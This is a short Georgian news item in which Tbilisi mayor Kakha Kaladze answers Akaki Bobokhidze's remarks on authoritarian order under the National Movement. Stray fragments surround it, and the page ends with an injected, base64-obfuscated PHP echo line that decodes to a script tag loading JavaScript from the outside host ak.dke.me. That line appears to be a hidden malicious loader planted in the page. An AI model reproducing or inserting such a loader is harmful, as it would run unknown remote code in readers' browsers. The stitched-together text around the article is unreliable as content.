celsiusi
ავერსი შნაიდერი
ასეთი მიდგომები რომ ჰქონდათ ქართველ ხალხთან, როგორც უსწორდებოდნენ, იმიტომ იმყოფებიან იქ, სადაც იმყოფებიან, ეს არის ქართველი ხალხის გადაწყვეტილება, – ამის შესახებ თბილისის მერმა კახა კალაძემ განაცხადა, რომელიც გამოეხმაურა „ევროპული საქართველოს“ წევრის აკაკი ბობოხიძის განცხადებას, სადაც ბობოხიძე აღნიშნავს: „იყო ავტორიტარიზმი, ძალაზე დამყარებული წესრიგი, ჩვენ ვცდილობდით, წესრიგისთვის შეგვეჩვია ქართველი ხალხი არა აღზრდის, არამედ მოთხოვნის გზით“.
 
კალაძის თქმით, „ნაციონალური მოძრაობის“ მმართველობის პერიოდში სიტყვის გამოხატვის თავისუფლება ხელყოფილი იყო.
 
„ეს მიდგომები რომ ჰქონდათ ქართველ ხალხთან, როგორ უსწორდებოდნენ, იმიტომ იმყოფებიან იქ, სადაც იმყოფებიან, ეს არის ქართველი ხალხის გადაწყვეტილება. რას ნიშნავს წესრიგის დამყარება მათი შეფასებით – პირდაპირ ხელყოფა იყო განსხვავებული აზრის, თავისუფლების, სიტყვის გამოხატვის თვალსაზრისით. შესაბამისად, ჩვენი ქვეყნის უმრავლესობამ მიიღო ის გადაწყვეტილება, რაც მიიღო 2012 წელს და მთელი ამ წლების განმავლობაში ხედავთ, როგორ მთავრდება არჩევნები“, – განაცხადა კახა კალაძემ.
 
361
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");